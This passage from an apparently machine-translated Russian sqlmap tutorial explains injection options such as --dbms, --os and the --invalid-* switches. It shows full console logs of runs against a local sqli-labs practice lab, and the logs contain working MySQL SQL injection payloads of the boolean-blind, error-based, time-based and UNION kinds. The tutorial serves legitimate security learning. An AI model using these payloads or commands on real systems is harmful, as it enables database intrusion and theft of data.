[20:38:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[20:38:53] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[20:38:54] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[20:38:55] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[20:38:56] [INFO] testing 'MySQL AND time-based blind (ELT)'
[20:38:57] [INFO] testing 'MySQL OR time-based blind (ELT)'
[20:38:58] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[20:38:59] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[20:38:59] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:39:01] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:39:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[20:39:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[20:39:02] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[20:39:02] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[20:39:02] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[20:39:02] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[20:39:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[20:39:02] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
[20:39:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:39:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:39:23] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[20:39:32] [WARNING] GET parameter 'id' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3431 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: uname=admin' AND 3447=3447 AND 'KGyg'='KGyg
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=admin' AND (SELECT 3589 FROM(SELECT COUNT(*),CONCAT(0x717a6b6a71,(SELECT (ELT(3589=3589,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xcai'='xcai
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=admin' AND (SELECT 2216 FROM (SELECT(SLEEP(5)))rUMt) AND 'oohs'='oohs
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: uname=-9826' UNION ALL SELECT CONCAT(0x717a6b6a71,0x5251674f4156424d73766576455768497757664846575255634647565852644255516a63674d4256,0x7171787071),NULL,NULL-- -
---
[20:39:32] [INFO] the back-end DBMS is MySQL
[20:39:32] [INFO] fetching banner
[20:39:32] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[20:39:32] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 20:39:32 /2020-02-29/
* Отметку также можно использовать в таких параметрах, как -user-agent и -proxy.
Четыре, параметры внедрения sqlmap
1. sqlmap обязательная настройка СУБД
По умолчанию sqlmap автоматически идентифицирует внутреннюю систему управления базами данных (СУБД) целевого веб-приложения. Типы СУБД, поддерживаемые sqlmap:
- MySQL
- Oracle
- PostgreSQL
- Microsoft SQL Server
- Microsoft Access
- Firebird
- SQLite
- Sybase
- SAP MaxDB
- DB2
Вы можете использовать параметры, чтобы указать базу данных для обнаружения:
Параметры:
--dbms тип базы данных
для проверки:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbms mysql --banner
Распечатать
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:40:41 /2020-03-01/
[09:40:42] [INFO] testing connection to the target URL
[09:40:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:40:42] [INFO] testing if the target URL content is stable
[09:40:42] [INFO] target URL content is stable
[09:40:42] [INFO] testing if GET parameter 'id' is dynamic
[09:40:42] [INFO] GET parameter 'id' appears to be dynamic
[09:40:42] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:40:42] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:40:42] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[09:40:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:40:51] [WARNING] reflective value(s) found and filtering out
[09:40:51] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[09:40:51] [INFO] testing 'Generic inline queries'
[09:40:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:40:51] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:40:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:40:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:40:52] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:40:52] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:40:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:40:52] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:40:52] [INFO] testing 'MySQL inline queries'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:40:52] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:40:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:40:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:40:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:41:02] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:41:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:41:02] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:41:02] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:41:02] [INFO] target URL appears to have 3 columns in query
[09:41:02] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7504=7504 AND 'BNEG'='BNEG
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 9479 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(9479=9479,1))),0x7171627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XPIc'='XPIc
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8767 FROM (SELECT(SLEEP(5)))trYN) AND 'UXYA'='UXYA
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8306' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707671,0x587572745246476f63786f6b6243456b66724b69784c66657866526f56457775726774675a787672,0x7171627871)-- -
---
[09:41:21] [INFO] the back-end DBMS is MySQL
[09:41:21] [INFO] fetching banner
[09:41:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[09:41:21] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 09:41:21 /2020-03-01/
2. sqlmap принудительно устанавливает систему ОС
По умолчанию sqlmap автоматически определяет внутреннюю операционную систему целевого веб-приложения.Типы ОС, которые полностью поддерживает sqlmap, — это Linux и Windows.
Обнаруженную операционную систему можно указать с помощью параметров:
Параметры:
--os тип системы
Тест:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbms mysql --os windows --banner
Распечатать
___
__H__
___ ___[,]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:42:55 /2020-03-01/
[09:42:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7504=7504 AND 'BNEG'='BNEG
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 9479 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(9479=9479,1))),0x7171627871,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.PLUGINS GROUP BY x)a) AND 'XPIc'='XPIc
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8767 FROM (SELECT(SLEEP(5)))trYN) AND 'UXYA'='UXYA
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8306' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707671,0x587572745246476f63786f6b6243456b66724b69784c66657866526f56457775726774675a787672,0
x7171627871)-- -
---
[09:42:56] [INFO] testing MySQL
[09:42:56] [INFO] confirming MySQL
[09:42:56] [INFO] the back-end DBMS is MySQL
[09:42:56] [INFO] fetching banner
[09:42:56] [INFO] the back-end DBMS operating system is Windows
back-end DBMS operating system: Windows
back-end DBMS: MySQL >= 5.0.0
banner: '5.7.26'
[09:42:56] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 09:42:56 /2020-03-01/
Еще раз протестируйте:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --os linux --banner
Распечатать
___
__H__
___ ___[,]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:45:48 /2020-03-01/
[09:45:48] [INFO] testing connection to the target URL
[09:45:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:45:48] [INFO] testing if the target URL content is stable
[09:45:49] [INFO] target URL content is stable
[09:45:49] [INFO] testing if GET parameter 'id' is dynamic
[09:45:49] [INFO] GET parameter 'id' appears to be dynamic
[09:45:49] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:45:49] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:45:49] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[09:45:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:45:51] [WARNING] reflective value(s) found and filtering out
[09:45:51] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[09:45:51] [INFO] testing 'Generic inline queries'
[09:45:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:45:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:45:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:45:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:45:52] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:45:52] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:45:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:45:52] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:45:52] [INFO] testing 'MySQL inline queries'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:45:52] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:45:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:45:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:46:02] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:46:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:46:02] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:46:02] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:46:02] [INFO] target URL appears to have 3 columns in query
[09:46:03] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8697=8697 AND 'vXiI'='vXiI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4143 FROM(SELECT COUNT(*),CONCAT(0x71786a6271,(SELECT (ELT(4143=4143,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vpOq'='vpOq
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4595 FROM (SELECT(SLEEP(5)))gWzN) AND 'BTap'='BTap
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6582' UNION ALL SELECT NULL,CONCAT(0x71786a6271,0x4f4152547367744d454144444f7859484d52646f6e49564467667458597843725466574363435a6d,0x71767a7a71),NULL-- -
---
[09:46:06] [INFO] the back-end DBMS is MySQL
[09:46:06] [INFO] fetching banner
[09:46:07] [INFO] the back-end DBMS operating system is Linux
[09:46:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS operating system: Linux
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[09:46:07] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 09:46:07 /2020-03-01/
3. Sqlmap принудительно устанавливает недопустимую замену значения
— Недопустимый параметр bignum
Когда sqlmap необходимо сделать недействительным исходное значение параметра (например, id = 13), он использует классическое отрицание (например, id = -13);
имеет параметры--invalid-bignum, Вы можете принудительно использовать большие целые числа для достижения той же цели (например, id = 99999999).
для проверки:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --invalid-bignum --banner -v 5
дисплей:
, который появляется
Payload: id=462284' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6a71,0x676b6a4b566742436e7a6763484c4d6b6d4c6e61736141644542466a65725072454d6a6852677855,0x717a6b6a71)-- -
То есть при обнаружении для идентификатора устанавливается большее значение, равное 462284.
— Неверно-логический параметр
С параметрами--invalid-logical, Вы можете принудительно использовать логические операции для достижения той же цели (например,id=13 and 18=19)。
Тест:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --invalid-logical --banner
Распечатать
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:08:58 /2020-03-01/
[10:08:59] [INFO] testing connection to the target URL
[10:08:59] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:08:59] [INFO] testing if the target URL content is stable
[10:08:59] [INFO] target URL content is stable
[10:08:59] [INFO] testing if GET parameter 'id' is dynamic
[10:08:59] [INFO] GET parameter 'id' appears to be dynamic
[10:08:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:08:59] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:08:59] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[10:09:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:09:01] [WARNING] reflective value(s) found and filtering out
[10:09:02] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[10:09:02] [INFO] testing 'Generic inline queries'
[10:09:02] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:09:02] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:09:02] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:09:02] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:09:02] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:09:02] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:09:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:09:02] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[10:09:02] [INFO] testing 'MySQL inline queries'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:09:02] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:09:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:09:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:09:12] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[10:09:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:09:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:09:12] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:09:12] [INFO] target URL appears to have 3 columns in query
[10:09:12] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3467=3467 AND 'vjnx'='vjnx
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 8283 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(8283=8283,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'whel'='whel
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7542 FROM (SELECT(SLEEP(5)))AXCz) AND 'TpNY'='TpNY
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1' AND 71 LIKE 72 UNION ALL SELECT NULL,CONCAT(0x716b627a71,0x4846764a516c586f4e7a4b5853725a43434f57454a5552516a4a494d576c494d4f61615353787549,0x716b7a7871),NULL-- -
---
[10:09:15] [INFO] the back-end DBMS is MySQL
[10:09:15] [INFO] fetching banner
[10:09:15] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[10:09:15] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 10:09:15 /2020-03-01/
Судя по всему, появился
Payload: id=1' AND 71 LIKE 72 UNION ALL SELECT NULL,CONCAT(0x716b627a71,0x4846764a516c586f4e7a4b5853725a43434f57454a5552516a4a494d576c494d4f61615353787549,0x716b7a7871),NULL-- -,
т.е.71 LIKE 72Эта логика неверна.
— Параметр недопустимой строки
С параметрами--invalid-string, Вы можете принудительно использовать случайные строки для достижения той же цели (например,id=akewmc)。
для проверки:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --invalid-string --banner
Распечатать
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:24:44 /2020-03-01/
[10:24:44] [INFO] testing connection to the target URL
[10:24:44] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:24:44] [INFO] testing if the target URL content is stable
[10:24:45] [INFO] target URL content is stable
[10:24:45] [INFO] testing if GET parameter 'id' is dynamic
[10:24:45] [INFO] GET parameter 'id' appears to be dynamic
[10:24:45] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:24:45] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:24:45] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[10:24:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:24:48] [WARNING] reflective value(s) found and filtering out
[10:24:48] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[10:24:48] [INFO] testing 'Generic inline queries'
[10:24:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:24:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:24:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:24:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:24:49] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:24:49] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:24:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:24:49] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[10:24:49] [INFO] testing 'MySQL inline queries'
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:24:49] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:24:49] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:24:49] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:24:59] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[10:24:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:24:59] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:24:59] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically e
xtending the range for current UNION query injection technique test
[10:24:59] [INFO] target URL appears to have 3 columns in query
[10:24:59] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6118=6118 AND 'VaYg'='VaYg
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4130 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(4130=4130,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.PLUGINS GROUP BY x)a) AND 'stHh'='stHh
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9229 FROM (SELECT(SLEEP(5)))WerB) AND 'LqGE'='LqGE
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=atUzqr' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x6765636e6d4f5655424e4870554575704574706c785866526a79697964754e774c6278726a4b6872,
0x71706b7871)-- -
---
[10:25:03] [INFO] the back-end DBMS is MySQL
[10:25:03] [INFO] fetching banner
[10:25:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[10:25:03] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 10:25:03 /2020-03-01/
Появившийся
